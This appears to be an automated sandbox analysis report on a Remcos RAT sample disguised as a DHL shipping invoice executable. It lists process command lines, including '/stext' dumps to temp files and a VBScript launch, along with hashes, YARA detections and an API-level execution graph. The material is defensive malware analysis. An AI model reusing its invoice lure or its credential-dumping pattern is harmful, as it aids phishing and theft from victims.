                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5 hash:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:02:38:26
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\vmwhb"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5 hash:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:02:38:26
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\fobaczdn"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5 hash:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:02:38:26
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\qipkdrohfbov"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5 hash:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:02:38:34
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs"
                                                                                                                                                                                                                                    Imagebase:0xcf0000
                                                                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                                                                    MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:15.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:19.8%
                                                                                                                                                                                                                                      Total number of Nodes:1544
                                                                                                                                                                                                                                      Total number of Limit Nodes:28
                                                                                                                                                                                                                                      execution_graph 3855 401941 3856 401943 3855->3856 3861 402c41 3856->3861 3862 402c4d 3861->3862 3906 4062dc 3862->3906 3865 401948 3867 4059cc 3865->3867 3948 405c97 3867->3948 3870 4059f4 DeleteFileW 3872 401951 3870->3872 3871 405a0b 3873 405b36 3871->3873 3962 4062ba lstrcpynW 3871->3962 3873->3872 3991 4065fd FindFirstFileW 3873->3991 3875 405a31 3876 405a44 3875->3876 3877 405a37 lstrcatW 3875->3877 3963 405bdb lstrlenW 3876->3963 3878 405a4a 3877->3878 3881 405a5a lstrcatW 3878->3881 3884 405a65 lstrlenW FindFirstFileW 3878->3884 3881->3884 3883 405b54 3994 405b8f lstrlenW CharPrevW 3883->3994 3886 405b2b 3884->3886 3904 405a87 3884->3904 3886->3873 3888 405b0e FindNextFileW 3892 405b24 FindClose 3888->3892 3888->3904 3889 405984 5 API calls 3891 405b66 3889->3891 3893 405b80 3891->3893 3894 405b6a 3891->3894 3892->3886 3896 405322 24 API calls 3893->3896 3894->3872 3897 405322 24 API calls 3894->3897 3896->3872 3899 405b77 3897->3899 3898 4059cc 60 API calls 3898->3904 3901 406080 36 API calls 3899->3901 3900 405322 24 API calls 3900->3888 3902 405b7e 3901->3902 3902->3872 3904->3888 3904->3898 3904->3900 3967 4062ba lstrcpynW 3904->3967 3968 405984 3904->3968 3976 405322 3904->3976 3987 406080 MoveFileExW 3904->3987 3922 4062e9 3906->3922 3907 406534 3908 402c6e 3907->3908 3939 4062ba lstrcpynW 3907->3939 3908->3865 3923 40654e 3908->3923 3910 406502 lstrlenW 3910->3922 3912 4062dc 10 API calls 3912->3910 3915 406417 GetSystemDirectoryW 3915->3922 3916 40642a GetWindowsDirectoryW 3916->3922 3917 40654e 5 API calls 3917->3922 3918 4062dc 10 API calls 3918->3922 3919 4064a5 lstrcatW 3919->3922 3920 40645e SHGetSpecialFolderLocation 3921 406476 SHGetPathFromIDListW CoTaskMemFree 3920->3921 3920->3922 3921->3922 3922->3907 3922->3910 3922->3912 3922->3915 3922->3916 3922->3917 3922->3918 3922->3919 3922->3920 3932 406188 3922->3932 3937 406201 wsprintfW 3922->3937 3938 4062ba lstrcpynW 3922->3938 3930 40655b 3923->3930 3924 4065d1 3925 4065d6 CharPrevW 3924->3925 3927 4065f7 3924->3927 3925->3924 3926 4065c4 CharNextW 3926->3924 3926->3930 3927->3865 3929 4065b0 CharNextW 3929->3930 3930->3924 3930->3926 3930->3929 3931 4065bf CharNextW 3930->3931 3944 405bbc 3930->3944 3931->3926 3940 406127 3932->3940 3935 4061ec 3935->3922 3936 4061bc RegQueryValueExW RegCloseKey 3936->3935 3937->3922 3938->3922 3939->3908 3941 406136 3940->3941 3942 40613a 3941->3942 3943 40613f RegOpenKeyExW 3941->3943 3942->3935 3942->3936 3943->3942 3945 405bc2 3944->3945 3946 405bd8 3945->3946 3947 405bc9 CharNextW 3945->3947 3946->3930 3947->3945 3997 4062ba lstrcpynW 3948->3997 3950 405ca8 3998 405c3a CharNextW CharNextW 3950->3998 3953 4059ec 3953->3870 3953->3871 3954 40654e 5 API calls 3960 405cbe 3954->3960 3955 405cef lstrlenW 3956 405cfa 3955->3956 3955->3960 3958 405b8f 3 API calls 3956->3958 3957 4065fd 2 API calls 3957->3960 3959 405cff GetFileAttributesW 3958->3959 3959->3953 3960->3953 3960->3955 3960->3957 3961 405bdb 2 API calls 3960->3961 3961->3955 3962->3875 3964 405be9 3963->3964 3965 405bfb 3964->3965 3966 405bef CharPrevW 3964->3966 3965->3878 3966->3964 3966->3965 3967->3904 4004 405d8b GetFileAttributesW 3968->4004 3971 4059a7 DeleteFileW 3974 4059ad 3971->3974 3972 40599f RemoveDirectoryW 3972->3974 3973 4059b1 3973->3904 3974->3973 3975 4059bd SetFileAttributesW 3974->3975 3975->3973 3977 40533d 3976->3977 3978 4053df 3976->3978 3979 405359 lstrlenW 3977->3979 3980 4062dc 17 API calls 3977->3980 3978->3904 3981 405382 3979->3981 3982 405367 lstrlenW 3979->3982 3980->3979 3984 405395 3981->3984 3985 405388 SetWindowTextW 3981->3985 3982->3978 3983 405379 lstrcatW 3982->3983 3983->3981 3984->3978 3986 40539b SendMessageW SendMessageW SendMessageW 3984->3986 3985->3984 3986->3978 3988 4060a1 3987->3988 3989 406094 3987->3989 3988->3904 4007 405f06 3989->4007 3992 406613 FindClose 3991->3992 3993 405b50 3991->3993 3992->3993 3993->3872 3993->3883 3995 405b5a 3994->3995 3996 405bab lstrcatW 3994->3996 3995->3889 3996->3995 3997->3950 3999 405c57 3998->3999 4001 405c69 3998->4001 4000 405c64 CharNextW 3999->4000 3999->4001 4003 405c8d 4000->4003 4002 405bbc CharNextW 4001->4002 4001->4003 4002->4001 4003->3953 4003->3954 4005 405990 4004->4005 4006 405d9d SetFileAttributesW 4004->4006 4005->3971 4005->3972 4005->3973 4006->4005 4008 405f36 4007->4008 4009 405f5c GetShortPathNameW 4007->4009 4034 405db0 GetFileAttributesW CreateFileW 4008->4034 4011 405f71 4009->4011 4012 40607b 4009->4012 4011->4012 4014 405f79 wsprintfA 4011->4014 4012->3988 4013 405f40 CloseHandle GetShortPathNameW 4013->4012 4015 405f54 4013->4015 4016 4062dc 17 API calls 4014->4016 4015->4009 4015->4012 4017 405fa1 4016->4017 4035 405db0 GetFileAttributesW CreateFileW 4017->4035 4019 405fae 4019->4012 4020 405fbd GetFileSize GlobalAlloc 4019->4020 4021 406074 CloseHandle 4020->4021 4022 405fdf 4020->4022 4021->4012 4036 405e33 ReadFile 4022->4036 4027 406012 4029 405d15 4 API calls 4027->4029 4028 405ffe lstrcpyA 4030 406020 4028->4030 4029->4030 4031 406057 SetFilePointer 4030->4031 4043 405e62 WriteFile 4031->4043 4034->4013 4035->4019 4037 405e51 4036->4037 4037->4021 4038 405d15 lstrlenA 4037->4038 4039 405d56 lstrlenA 4038->4039 4040 405d2f lstrcmpiA 4039->4040 4042 405d5e 4039->4042 4041 405d4d CharNextA 4040->4041 4040->4042 4041->4039 4042->4027 4042->4028 4044 405e80 GlobalFree 4043->4044 4044->4021 4045 4015c1 4046 402c41 17 API calls 4045->4046 4047 4015c8 4046->4047 4048 405c3a 4 API calls 4047->4048 4060 4015d1 4048->4060 4049 401631 4051 401663 4049->4051 4052 401636 4049->4052 4050 405bbc CharNextW 4050->4060 4054 401423 24 API calls 4051->4054 4072 401423 4052->4072 4061 40165b 4054->4061 4059 40164a SetCurrentDirectoryW 4059->4061 4060->4049 4060->4050 4062 401617 GetFileAttributesW 4060->4062 4064 40588b 4060->4064 4067 4057f1 CreateDirectoryW 4060->4067 4076 40586e CreateDirectoryW 4060->4076 4062->4060 4079 406694 GetModuleHandleA 4064->4079 4068 405842 GetLastError 4067->4068 4069 40583e 4067->4069 4068->4069 4070 405851 SetFileSecurityW 4068->4070 4069->4060 4070->4069 4071 405867 GetLastError 4070->4071 4071->4069 4073 405322 24 API calls 4072->4073 4074 401431 4073->4074 4075 4062ba lstrcpynW 4074->4075 4075->4059 4077 405882 GetLastError 4076->4077 4078 40587e 4076->4078 4077->4078 4078->4060 4080 4066b0 4079->4080 4081 4066ba GetProcAddress 4079->4081 4085 406624 GetSystemDirectoryW 4080->4085 4083 405892 4081->4083 4083->4060 4084 4066b6 4084->4081 4084->4083 4086 406646 wsprintfW LoadLibraryExW 4085->4086 4086->4084 4719 401e49 4720 402c1f 17 API calls 4719->4720 4721 401e4f 4720->4721 4722 402c1f 17 API calls 4721->4722 4723 401e5b 4722->4723 4724 401e72 EnableWindow 4723->4724 4725 401e67 ShowWindow 4723->4725 4726 402ac5 4724->4726 4725->4726 4096 40264a 4110 402c1f 4096->4110 4098 402796 4099 4026a3 ReadFile 4099->4098 4107 402659 4099->4107 4100 40273c 4100->4098 4100->4107 4113 405e91 SetFilePointer 4100->4113 4101 405e33 ReadFile 4101->4107 4103 4026e3 MultiByteToWideChar 4103->4107 4104 402798 4122 406201 wsprintfW 4104->4122 4106 402709 SetFilePointer MultiByteToWideChar 4106->4107 4107->4098 4107->4099 4107->4100 4107->4101 4107->4103 4107->4104 4107->4106 4108 4027a9 4107->4108 4108->4098 4109 4027ca SetFilePointer 4108->4109 4109->4098 4111 4062dc 17 API calls 4110->4111 4112 402c34 4111->4112 4112->4107 4114 405ead 4113->4114 4121 405ec5 4113->4121 4115 405e33 ReadFile 4114->4115 4116 405eb9 4115->4116 4117 405ef6 SetFilePointer 4116->4117 4118 405ece SetFilePointer 4116->4118 4116->4121 4117->4121 4118->4117 4119 405ed9 4118->4119 4120 405e62 WriteFile 4119->4120 4120->4121 4121->4100 4122->4098 4730 4016cc 4731 402c41 17 API calls 4730->4731 4732 4016d2 GetFullPathNameW 4731->4732 4733 40170e 4732->4733 4734 4016ec 4732->4734 4735 401723 GetShortPathNameW 4733->4735 4736 402ac5 4733->4736 4734->4733 4737 4065fd 2 API calls 4734->4737 4735->4736 4738 4016fe 4737->4738 4738->4733 4740 4062ba lstrcpynW 4738->4740 4740->4733 4133 40234e 4134 402c41 17 API calls 4133->4134 4135 40235d 4134->4135 4136 402c41 17 API calls 4135->4136 4137 402366 4136->4137 4138 402c41 17 API calls 4137->4138 4139 402370 GetPrivateProfileStringW 4138->4139 4741 401b53 4742 402c41 17 API calls 4741->4742 4743 401b5a 4742->4743 4744 402c1f 17 API calls 4743->4744 4745 401b63 wsprintfW 4744->4745 4746 402ac5 4745->4746 4747 401956 4748 402c41 17 API calls 4747->4748 4749 40195d lstrlenW 4748->4749 4750 402592 4749->4750 4705 4014d7 4706 402c1f 17 API calls 4705->4706 4707 4014dd Sleep 4706->4707 4709 402ac5 4707->4709 4751 403d58 4752 403d70 4751->4752 4753 403eab 4751->4753 4752->4753 4754 403d7c 4752->4754 4755 403ebc GetDlgItem GetDlgItem 4753->4755 4764 403efc 4753->4764 4756 403d87 SetWindowPos 4754->4756 4757 403d9a 4754->4757 4837 404231 4755->4837 4756->4757 4761 403db7 4757->4761 4762 403d9f ShowWindow 4757->4762 4759 403f56 4760 40427d SendMessageW 4759->4760 4770 403ea6 4759->4770 4811 403f68 4760->4811 4766 403dd9 4761->4766 4767 403dbf DestroyWindow 4761->4767 4762->4761 4763 403ee6 SetClassLongW 4768 40140b 2 API calls 4763->4768 4764->4759 4765 401389 2 API calls 4764->4765 4769 403f2e 4765->4769 4772 403dde SetWindowLongW 4766->4772 4773 403def 4766->4773 4771 4041ba 4767->4771 4768->4764 4769->4759 4774 403f32 SendMessageW 4769->4774 4771->4770 4782 4041eb ShowWindow 4771->4782 4772->4770 4777 403e66 4773->4777 4778 403dfb GetDlgItem 4773->4778 4774->4770 4775 40140b 2 API calls 4775->4811 4776 4041bc DestroyWindow EndDialog 4776->4771 4823 404298 4777->4823 4779 403e2b 4778->4779 4780 403e0e SendMessageW IsWindowEnabled 4778->4780 4784 403e38 4779->4784 4785 403e7f SendMessageW 4779->4785 4786 403e4b 4779->4786 4793 403e30 4779->4793 4780->4770 4780->4779 4782->4770 4783 4062dc 17 API calls 4783->4811 4784->4785 4784->4793 4785->4777 4788 403e53 4786->4788 4789 403e68 4786->4789 4792 40140b 2 API calls 4788->4792 4790 40140b 2 API calls 4789->4790 4790->4793 4791 404231 18 API calls 4791->4811 4792->4793 4793->4777 4820 40420a 4793->4820 4794 404231 18 API calls 4795 403fe3 GetDlgItem 4794->4795 4796 404000 ShowWindow EnableWindow 4795->4796 4797 403ff8 4795->4797 4840 404253 EnableWindow 4796->4840 4797->4796 4799 40402a EnableWindow 4804 40403e 4799->4804 4800 404043 GetSystemMenu EnableMenuItem SendMessageW 4801 404073 SendMessageW 4800->4801 4800->4804 4801->4804 4803 403d39 18 API calls 4803->4804 4804->4800 4804->4803 4841 404266 SendMessageW 4804->4841 4842 4062ba lstrcpynW 4804->4842 4806 4040a2 lstrlenW 4807 4062dc 17 API calls 4806->4807 4808 4040b8 SetWindowTextW 4807->4808 4809 401389 2 API calls 4808->4809 4809->4811 4810 4040fc DestroyWindow 4810->4771 4812 404116 CreateDialogParamW 4810->4812 4811->4770 4811->4775 4811->4776 4811->4783 4811->4791 4811->4794 4811->4810 4812->4771 4813 404149 4812->4813 4814 404231 18 API calls 4813->4814 4815 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4814->4815 4816 401389 2 API calls 4815->4816 4817 40419a 4816->4817 4817->4770 4818 4041a2 ShowWindow 4817->4818 4819 40427d SendMessageW 4818->4819 4819->4771 4821 404211 4820->4821 4822 404217 SendMessageW 4820->4822 4821->4822 4822->4777 4824 40435b 4823->4824 4825 4042b0 GetWindowLongW 4823->4825 4824->4770 4825->4824 4826 4042c5 4825->4826 4826->4824 4827 4042f2 GetSysColor 4826->4827 4828 4042f5 4826->4828 4827->4828 4829 404305 SetBkMode 4828->4829 4830 4042fb SetTextColor 4828->4830 4831 404323 4829->4831 4832 40431d GetSysColor 4829->4832 4830->4829 4833 404334 4831->4833 4834 40432a SetBkColor 4831->4834 4832->4831 4833->4824 4835 404347 DeleteObject 4833->4835 4836 40434e CreateBrushIndirect 4833->4836 4834->4833 4835->4836 4836->4824 4838 4062dc 17 API calls 4837->4838 4839 40423c SetDlgItemTextW 4838->4839 4839->4763 4840->4799 4841->4804 4842->4806 4843 401f58 4844 402c41 17 API calls 4843->4844 4845 401f5f 4844->4845 4846 4065fd 2 API calls 4845->4846 4847 401f65 4846->4847 4849 401f76 4847->4849 4850 406201 wsprintfW 4847->4850 4850->4849 4851 402259 4852 402c41 17 API calls 4851->4852 4853 40225f 4852->4853 4854 402c41 17 API calls 4853->4854 4855 402268 4854->4855 4856 402c41 17 API calls 4855->4856 4857 402271 4856->4857 4858 4065fd 2 API calls 4857->4858 4859 40227a 4858->4859 4860 40228b lstrlenW lstrlenW 4859->4860 4864 40227e 4859->4864 4861 405322 24 API calls 4860->4861 4863 4022c9 SHFileOperationW 4861->4863 4862 405322 24 API calls 4865 402286 4862->4865 4863->4864 4863->4865 4864->4862 4866 73a4103d 4869 73a4101b 4866->4869 4876 73a41516 4869->4876 4871 73a41020 4872 73a41024 4871->4872 4873 73a41027 GlobalAlloc 4871->4873 4874 73a4153d 3 API calls 4872->4874 4873->4872 4875 73a4103b 4874->4875 4878 73a4151c 4876->4878 4877 73a41522 4877->4871 4878->4877 4879 73a4152e GlobalFree 4878->4879 4879->4871 4880 4046db 4881 404711 4880->4881 4882 4046eb 4880->4882 4884 404298 8 API calls 4881->4884 4883 404231 18 API calls 4882->4883 4885 4046f8 SetDlgItemTextW 4883->4885 4886 40471d 4884->4886 4885->4881 4713 40175c 4714 402c41 17 API calls 4713->4714 4715 401763 4714->4715 4716 405ddf 2 API calls 4715->4716 4717 40176a 4716->4717 4718 405ddf 2 API calls 4717->4718 4718->4717 4887 4022dd 4888 4022f7 4887->4888 4889 4022e4 4887->4889 4890 4062dc 17 API calls 4889->4890 4891 4022f1 4890->4891 4892 405920 MessageBoxIndirectW 4891->4892 4892->4888 4893 401d5d GetDlgItem GetClientRect 4894 402c41 17 API calls 4893->4894 4895 401d8f LoadImageW SendMessageW 4894->4895 4896 402ac5 4895->4896 4897 401dad DeleteObject 4895->4897 4897->4896 4898 405461 4899 405482 GetDlgItem GetDlgItem GetDlgItem 4898->4899 4900 40560b 4898->4900 4943 404266 SendMessageW 4899->4943 4902 405614 GetDlgItem CreateThread CloseHandle 4900->4902 4904 40563c 4900->4904 4902->4904 4903 405667 4908 4056c7 4903->4908 4912 4056a1 ShowWindow 4903->4912 4913 40567b 4903->4913 4904->4903 4906 405653 ShowWindow ShowWindow 4904->4906 4907 40568c 4904->4907 4905 4054f2 4910 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4905->4910 4945 404266 SendMessageW 4906->4945 4909 404298 8 API calls 4907->4909 4908->4907 4920 4056d5 SendMessageW 4908->4920 4915 40569a 4909->4915 4918 405567 4910->4918 4919 40554b SendMessageW SendMessageW 4910->4919 4916 4056c1 4912->4916 4917 4056b3 4912->4917 4914 40420a SendMessageW 4913->4914 4914->4907 4922 40420a SendMessageW 4916->4922 4921 405322 24 API calls 4917->4921 4923 40557a 4918->4923 4924 40556c SendMessageW 4918->4924 4919->4918 4920->4915 4925 4056ee CreatePopupMenu 4920->4925 4921->4916 4922->4908 4927 404231 18 API calls 4923->4927 4924->4923 4926 4062dc 17 API calls 4925->4926 4928 4056fe AppendMenuW 4926->4928 4929 40558a 4927->4929 4932 40571b GetWindowRect 4928->4932 4933 40572e TrackPopupMenu 4928->4933 4930 405593 ShowWindow 4929->4930 4931 4055c7 GetDlgItem SendMessageW 4929->4931 4934 4055b6 4930->4934 4935 4055a9 ShowWindow 4930->4935 4931->4915 4937 4055ee SendMessageW SendMessageW 4931->4937 4932->4933 4933->4915 4936 405749 4933->4936 4944 404266 SendMessageW 4934->4944 4935->4934 4938 405765 SendMessageW 4936->4938 4937->4915 4938->4938 4939 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4938->4939 4941 4057a7 SendMessageW 4939->4941 4941->4941 4942 4057d0 GlobalUnlock SetClipboardData CloseClipboard 4941->4942 4942->4915 4943->4905 4944->4931 4945->4903 4946 401563 4947 402a6b 4946->4947 4950 406201 wsprintfW 4947->4950 4949 402a70 4950->4949 4951 4023e4 4952 402c41 17 API calls 4951->4952 4953 4023f6 4952->4953 4954 402c41 17 API calls 4953->4954 4955 402400 4954->4955 4968 402cd1 4955->4968 4958 40288b 4959 402438 4961 402444 4959->4961 4964 402c1f 17 API calls 4959->4964 4960 402c41 17 API calls 4963 40242e lstrlenW 4960->4963 4962 402463 RegSetValueExW 4961->4962 4965 403116 31 API calls 4961->4965 4966 402479 RegCloseKey 4962->4966 4963->4959 4964->4961 4965->4962 4966->4958 4969 402cec 4968->4969 4972 406155 4969->4972 4973 406164 4972->4973 4974 402410 4973->4974 4975 40616f RegCreateKeyExW 4973->4975 4974->4958 4974->4959 4974->4960 4975->4974 4976 73a41000 4977 73a4101b 5 API calls 4976->4977 4978 73a41019 4977->4978 4979 404367 lstrcpynW lstrlenW 4980 402868 4981 402c41 17 API calls 4980->4981 4982 40286f FindFirstFileW 4981->4982 4983 402897 4982->4983 4987 402882 4982->4987 4988 406201 wsprintfW 4983->4988 4985 4028a0 4989 4062ba lstrcpynW 4985->4989 4988->4985 4989->4987 4990 401968 4991 402c1f 17 API calls 4990->4991 4992 40196f 4991->4992 4993 402c1f 17 API calls 4992->4993 4994 40197c 4993->4994 4995 402c41 17 API calls 4994->4995 4996 401993 lstrlenW 4995->4996 4997 4019a4 4996->4997 4998 4019e5 4997->4998 5002 4062ba lstrcpynW 4997->5002 5000 4019d5 5000->4998 5001 4019da lstrlenW 5000->5001 5001->4998 5002->5000 5003 403968 5004 403973 5003->5004 5005 403977 5004->5005 5006 40397a GlobalAlloc 5004->5006 5006->5005 5007 40166a 5008 402c41 17 API calls 5007->5008 5009 401670 5008->5009 5010 4065fd 2 API calls 5009->5010 5011 401676 5010->5011 4174 4027ef 4175 4027f6 4174->4175 4177 402a70 4174->4177 4176 402c1f 17 API calls 4175->4176 4178 4027fd 4176->4178 4179 40280c SetFilePointer 4178->4179 4179->4177 4180 40281c 4179->4180 4182 406201 wsprintfW 4180->4182 4182->4177 4183 40176f 4184 402c41 17 API calls 4183->4184 4185 401776 4184->4185 4186 401796 4185->4186 4187 40179e 4185->4187 4243 4062ba lstrcpynW 4186->4243 4244 4062ba lstrcpynW 4187->4244 4190 40179c 4193 40654e 5 API calls 4190->4193 4191 4017a9 4192 405b8f 3 API calls 4191->4192 4194 4017af lstrcatW 4192->4194 4212 4017bb 4193->4212 4194->4190 4195 4065fd 2 API calls 4195->4212 4196 4017f7 4197 405d8b 2 API calls 4196->4197 4197->4212 4199 4017cd CompareFileTime 4199->4212 4200 40188d 4201 405322 24 API calls 4200->4201 4203 401897 4201->4203 4202 401864 4204 405322 24 API calls 4202->4204 4211 401879 4202->4211 4223 403116 4203->4223 4204->4211 4205 4062ba lstrcpynW 4205->4212 4208 4018be SetFileTime 4210 4018d0 CloseHandle 4208->4210 4209 4062dc 17 API calls 4209->4212 4210->4211 4213 4018e1 4210->4213 4212->4195 4212->4196 4212->4199 4212->4200 4212->4202 4212->4205 4212->4209 4222 405db0 GetFileAttributesW CreateFileW 4212->4222 4245 405920 4212->4245 4214 4018e6 4213->4214 4215 4018f9 4213->4215 4216 4062dc 17 API calls 4214->4216 4217 4062dc 17 API calls 4215->4217 4219 4018ee lstrcatW 4216->4219 4220 401901 4217->4220 4219->4220 4221 405920 MessageBoxIndirectW 4220->4221 4221->4211 4222->4212 4224 40312f 4223->4224 4225 40315d 4224->4225 4252 403347 SetFilePointer 4224->4252 4249 403331 4225->4249 4229 4032ca 4231 40330c 4229->4231 4236 4032ce 4229->4236 4230 40317a GetTickCount 4232 4018aa 4230->4232 4239 4031c9 4230->4239 4234 403331 ReadFile 4231->4234 4232->4208 4232->4210 4233 403331 ReadFile 4233->4239 4234->4232 4235 403331 ReadFile 4235->4236 4236->4232 4236->4235 4237 405e62 WriteFile 4236->4237 4237->4236 4238 40321f GetTickCount 4238->4239 4239->4232 4239->4233 4239->4238 4240 403244 MulDiv wsprintfW 4239->4240 4242 405e62 WriteFile 4239->4242 4241 405322 24 API calls 4240->4241 4241->4239 4242->4239 4243->4190 4244->4191 4246 405935 4245->4246 4247 405981 4246->4247 4248 405949 MessageBoxIndirectW 4246->4248 4247->4212 4248->4247 4250 405e33 ReadFile 4249->4250 4251 403168 4250->4251 4251->4229 4251->4230 4251->4232 4252->4225 5012 4043f0 5013 404408 5012->5013 5016 404522 5012->5016 5017 404231 18 API calls 5013->5017 5014 40458c 5015 404596 GetDlgItem 5014->5015 5018 404656 5014->5018 5019 4045b0 5015->5019 5020 404617 5015->5020 5016->5014 5016->5018 5021 40455d GetDlgItem SendMessageW 5016->5021 5022 40446f 5017->5022 5023 404298 8 API calls 5018->5023 5019->5020 5027 4045d6 SendMessageW LoadCursorW SetCursor 5019->5027 5020->5018 5028 404629 5020->5028 5045 404253 EnableWindow 5021->5045 5025 404231 18 API calls 5022->5025 5026 404651 5023->5026 5030 40447c CheckDlgButton 5025->5030 5049 40469f 5027->5049 5032 40463f 5028->5032 5033 40462f SendMessageW 5028->5033 5029 404587 5046 40467b 5029->5046 5043 404253 EnableWindow 5030->5043 5032->5026 5034 404645 SendMessageW 5032->5034 5033->5032 5034->5026 5038 40449a GetDlgItem 5044 404266 SendMessageW 5038->5044 5040 4044b0 SendMessageW 5041 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5040->5041 5042 4044cd GetSysColor 5040->5042 5041->5026 5042->5041 5043->5038 5044->5040 5045->5029 5047 404689 5046->5047 5048 40468e SendMessageW 5046->5048 5047->5048 5048->5014 5052 4058e6 ShellExecuteExW 5049->5052 5051 404605 LoadCursorW SetCursor 5051->5020 5052->5051 5053 401a72 5054 402c1f 17 API calls 5053->5054 5055 401a7b 5054->5055 5056 402c1f 17 API calls 5055->5056 5057 401a20 5056->5057 5058 401cf3 5059 402c1f 17 API calls 5058->5059 5060 401cf9 IsWindow 5059->5060 5061 401a20 5060->5061 5062 401573 5063 401583 ShowWindow 5062->5063 5064 40158c 5062->5064 5063->5064 5065 402ac5 5064->5065 5066 40159a ShowWindow 5064->5066 5066->5065 5067 402df3 5068 402e05 SetTimer 5067->5068 5069 402e1e 5067->5069 5068->5069 5070 402e73 5069->5070 5071 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5069->5071 5071->5070 5072 4014f5 SetForegroundWindow 5073 402ac5 5072->5073 5074 402576 5075 402c41 17 API calls 5074->5075 5076 40257d 5075->5076 5079 405db0 GetFileAttributesW CreateFileW 5076->5079 5078 402589 5079->5078 4710 73a42993 4711 73a429e3 4710->4711 4712 73a429a3 VirtualProtect 4710->4712 4712->4711 5080 401b77 5081 401b84 5080->5081 5082 401bc8 5080->5082 5085 401c0d 5081->5085 5088 401b9b 5081->5088 5083 401bf2 GlobalAlloc 5082->5083 5084 401bcd 5082->5084 5087 4062dc 17 API calls 5083->5087 5098 4022f7 5084->5098 5101 4062ba lstrcpynW 5084->5101 5086 4062dc 17 API calls 5085->5086 